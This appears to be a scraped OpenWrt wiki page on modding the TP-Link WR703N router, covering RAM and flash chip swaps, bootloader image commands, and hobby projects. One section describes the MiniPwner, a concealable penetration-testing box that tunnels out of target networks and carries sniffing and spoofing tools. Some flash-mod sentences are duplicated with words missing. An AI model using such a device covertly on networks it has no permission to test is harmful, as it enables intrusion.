The USB port on the WR703n is not compatible with USB1 devices (aka full speed) and only works properly with USB2 (aka high speed) devices. You can however plug a USB-Serial adapter as long as you plug that through a <$10 USB2. While you're at it, use another USB port to plug in a USB key and write data there (like serial console logs) so as not to wear out the built in flash. See this page for more tips and how to create a serial console server out of your WR703n: http://marc.merlins.org/perso/linux/post_2012-12-05_Serial-Console-With-WR703N.html

GPS Tracking Example

Here is a recipe for gps tracking using a usb gps module. https://forum.openwrt.org/viewtopic.php?pid=185438

Software Mods

DIY Projects

Bootloader Mods

Hardware Mods

Webradio device

This project implements a webradio with cheep usb soundcard and a speaker of an old mobile phone within the casing of the router. There are two analogue controllers for selecting the stream and the volume. Therefor an attiny85 is connected to the uart. Building a tiny webradio with analog volume and tune controller

64MB RAM Mod

The Device uses a DDR1 16Mbit x 16bit (16Mibit*16=256 mebibit. 256 mebibit/8=32MiByte) 400MHz chip Zentel A3S56D40FTP. Replace it with any 32Mbit x 16bit chip. 333MHz instead of 400MHz also works fine. It's quite hard to find these chips. One of the ways to get them is to have a look at DDR SO-DIMM (because SO-DIMM modules are shipped with x16 chips). Since there are no 64Mbit x 16bit DDR1 Chips available → no 128 MB mod! The most easy approach is to seek for a 4-chip DDR 256 MB module. These all have x16 chips too. Chips only on one side (not to be confused with double-sided 256 MB modules with 4 chips on each side) and only 4 of them - that's the best chance to get some. They represent a small percent among usual 8-chip modules but this is equalized with the amount and "cheap as dirt" price of such DDR 256 MB modules. Chip can also be salvaged from dead HDD with 64Mb cache, for example 2Tb Western Digital WD2002FYPS Working chips: Hynix HY5DU121622DTP-D43 (From Mustang DDR SO-DIMM 512 MB )

Hynix HY5DU121622CTP-D43 (From Hynix DDR SO-DIMM PC2700S-25330 512MB DDR 333MHz CL 2.5, chips are 400Mhz compatible due to "D43" marking.)

Hynix HY5DU121622AT-J (From DDR 256MB PC400 (BUD968RA))﻿

Infineon HYB25D512160BE (From Infineon DDR SO-DIMM 512 MB )

Infineon HYB25DC512160CE-5 (From Transcend DDR SO-DIMM 512 MB )

Elpida EDD5116ADTA-6B-E (From Elpida DDR SO-DIMM 512 MB )

Elpida EDD5116AFTA-5B-E (From Elpida DDR SO-DIMM 512 MB )

Alliance AS4C32M16D1-5TCN (From DigiKey , $2.76)

Samsung K4H511638G-LCCC (From WD20EARS Controller Board) Additional list that may work: Type ID Code Vendor DDR 32Mx16 DDR 400 TSOP Pb Free HY5DU121622DTP-D43-C Hynix DDR 32Mx16 DDR 400 TSOP Pb Free H5DU5162ETR-E3C Hynix DDR 32Mx16 DDR 400 Pb Free K4H511638J-LCCC Samsung DDR 32Mx16 DDR 400 A3S12D40ETP-G5 Zentel DDR 32Mx16 DDR 400 NT5DS32M16BS-5T Nanya DDR 32Mx16 DDR 400 PB Free P3S12D40ETP-GUTT Mira DDR 32Mx16 DDR 333 CL2.5 TSOP MT46V32M16TG-6T:F Micron DDR 32Mx16 DDR 333 CL2.5 TSOP MT46V32M16P-6T:F Micron DDR 32Mx16 DDR 333 PB Free TSOP HYB25D512160CE-6 Qimonda DDR 32Mx16 DDR 333 PB Free TSOP HYB25D512160CEL-6 Qimonda DDR 32Mx16 DDR 333 PB Free TSOP HYB25D512160DE-6 Qimonda By default router is able to see all 64MB. root@OpenWrt:~# free total used free shared buffers Mem: 61864 48044 13820 0 30316

16MB Flash Mod

Remarks

Consider simply buying a GL.iNet 6416 . Seriously, this is likely the device you actually want. And it's so cheap that it beats the time, trouble and money spend on modding - unless you do this modding for fun or educational purposes…

most likely not supported by the boot loader which resides on your old chip , therefore you cannot simply burn the 4 MB chip content on the new 16 MB chip and everything will be working. If you try this the LED will glow purple-ish. You will have to replace U-Boot with 16MB flash chips are, therefore you cannot simply burn the 4chip content on the new 16chip and everything will be working. If you try this the LED will glow purple-ish. You will have to replace U-Boot with a special version based on 1.1.4 , supported chips are: Winbond W25Q128 (16 MB , JEDEC ID: EF 4018) Macronix MX25L128 (16 MB , JEDEC ID: C2 2018, C2 2618) Spansion S25FL127S (16 MB , JEDEC ID: 01 2018)

If you've made (or bought) a device with 16MB of flash, you will still have difficulty building images larger than 4MB, even though you can use all 16MB once you've flashed an image (functionality provided by an appropriate bootloader, such as pepe2k u-boot mod). The reason is because the WR703N profile has a limit of 4MB, which is enforced by the mktplinkfw (make TP-Link Firmware) tool when the image is created. To enlarge this limit to 16MB, you can try the following (worked for me on 14.07/BB, b41353): sed -i '/TLWR703/ s/4Mlzma/16Mlzma/' target / linux / ar71xx / image / Makefile sed -i '/TL-WR703Nv1/,/layout/{s/4Mlzma/16Mlzma/;}' tools / firmware-utils / src / mktplinkfw.c If you've made (or bought) a device with 16MB of flash, you will still have difficultyimages larger than 4MB, even though you can use all 16MB once you've flashed an image (functionality provided by an appropriate bootloader, such as pepe2k u-boot mod). The reason is because the WR703N profile has a limit of 4MB, which is enforced by the(make TP-Link Firmware) tool when the image is created. To enlarge this limit to 16MB, you can try the following (worked for me on 14.07/BB, b41353):

See: https://forum.openwrt.org/viewtopic.php?pid=238165 for more information.

Create a working image

In order to replace the 4mb flash chip with a 16mb one you may at first dump two important partitions: 64k u-boot + 64k data section: at the beginning of the chip. The data section is important as it contains MAC (at 0x1FC00) and PIN (at 0x1FE00) as well as Model information.

64k ART partition: which contains wireless voodoo configuration. Without it your wifi won't come up. After dumping the memory , use dd to extract the second and last block. #!/bin/sh # new image size # block size -> 64k bs=65536 ls -l flash_dump # -rw-rw-r-- 1 makefu makefu 4194304 Mar 21 10:28 flash_dump flash_size=$(ls -l flash_dump | cut -d\ -f 5) # 4194304 / 65536 num_blocks=$(($flash_size/$bs)) # 64 blocks, 64kilobyte each dd if=flash_dump of=data.bin bs=$bs count=1 skip=1 dd if=flash_dump of=art.bin bs=$bs count=1 skip=$(($num_blocks-1)) After that you can cat together your new image: new_image_size=16777216 truncate --size $((new_image_size-3*$bs)) whitespace.bin # build pepe2k bootloader at first: see https://github.com/pepe2k/u-boot_mod cat uboot_for_tp-link_tl-wr703n.bin \ data.bin \ whitespace.bin \ art.bin > wr703_bootloader_data_whitespace_art.bin Flash this image with your SPI-programmer on your new chip and solder it in. You can now hold the button for 3 seconds (will blink each second) and release to make the bootloader start a httpd at 192.168.1.1. Flash this image with your SPI-programmer on your new chip and solder it in. You can now hold the button for 3 seconds (will blink each second) and release to make the bootloader start a httpd at

MiniPwner Home

The MiniPwner's key features include: Integrated Wired and Wireless connections Once plugged into a target network, the Mini-Pwner can establish an SSH tunnel through the target network, or can be accessed by wifi. In addition, the MiniPwner can be configured as a wifi sniffer and logger - wardriving in your pocket. Low power consumption, can be run off battery. With the 1700 mAh battery included in the kit, the Mini-Pwner will run for over five hours of active wired and wireless activity. No need to find a power outlet during the pen test. Multiple Pen Testing Tools included tcpdump, nmap, kismet, all come pre-installed Flexible and Expandable The MiniPwner runs on the open source OpenWrt operating system. You can easily add or change the installed packages. Small size The MiniPwner can be easily carried in a pocket, hidden behind a telephone, or hang from a jack by a short ethernet cable. There are many other creative ways to use the MiniPwner. Here is a list of some of the software that comes installed: Nmap network scanner

Tcpdump sniffer

Netcat Hacker’s swiss army knife

aircrack Wireless network analysis

kismet Wireless network analysis

perl Perl Scripting Language

openvpn VPN Client and Server

dsniff suite of sniffing and spoofing tools, including arpspoof

nbtscan NetBIOS Network Scanner

snort Sniffer, Packet Logger, Intrusion Detection System

karma Wireless Sniffing Tool - not working yet….

samba2-client Windows File Sharing Client

elinks Text Based Web Browser

yafc FTP Client

openssh-sftp-client Secure File Transfer Client Web - http://www.minipwner.com/

WR703N Expander board and case

Kean Electronics in conjunction with the Sydney Hackerspace has developed WR703N Expander board as Open Hardware, all schematics are available online on their website - http://www.kean.com.au/oshw/WR703N/ Connector Info The upstream USB connection is intended to come via a 4 pin header plugged into the WR703N PCB below (existing USB connector removed).

You can also populate a mini-B connector for connection to any upstream USB host via a

You can populate up to 3 USB A female connectors, or use 0.1" headers/connectors to mount USB connectors

USB1 and USB2 are intended to be standard right angle connectors, but will also take vertical style.

USB2 is recessed - partly to make the PCB able to be mounted very low on top of the WR703N PCB, but it also makes it suitable for very small USB drives (Sandisk Cruzer Fit).

USB3 can be a right angle or more usually a vertical connector. Or left off completely.

If a right angle connector is used for USB3, you can't easily use PORTB (and you should probably put some insulating tape over the PORTB pads).

The PORTA and PORTB headers are similar to the common SparkFun FTDI connector, although they include RTS instead of DTR.

The GPIO connector is intended to be a standard 2x5 box header.

See the schematic for pin outs of the GPIO and serial ports. Due to space restrictions, the extra 8 GPIO's from PORTB are not routed out.

WebI2C: I2C,SPI,1-Wire